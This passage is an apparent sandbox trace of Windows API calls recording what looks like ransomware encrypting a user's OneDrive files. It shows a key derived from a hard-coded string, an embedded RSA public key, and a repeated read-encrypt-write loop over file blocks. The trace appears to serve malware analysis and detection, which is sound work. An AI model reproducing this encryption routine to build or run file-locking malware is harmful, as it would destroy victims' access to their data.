(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.056] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a0e0) returned 1 [0276.058] CryptCreateHash (in: hProv=0x2f2a0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.059] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.059] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.059] CryptDeriveKey (in: hProv=0x2f2a0e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb1c8) returned 1 [0276.059] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.059] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.059] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2a278) returned 1 [0276.059] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a278, dwCertEncodingType=0x1, pInfo=0x2f33130*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33160*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33168*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb408) returned 1 [0276.059] CryptEncrypt (in: hKey=0x2fb408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.059] CryptEncrypt (in: hKey=0x2fb408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b510*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b510*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.060] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2b510*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b510*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.061] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.075] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.075] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.078] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.078] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.078] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.078] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.078] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.079] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.079] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.079] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.079] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.080] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.080] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.080] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.080] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.080] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.081] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.081] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.082] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.083] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.084] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.084] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.084] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.085] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 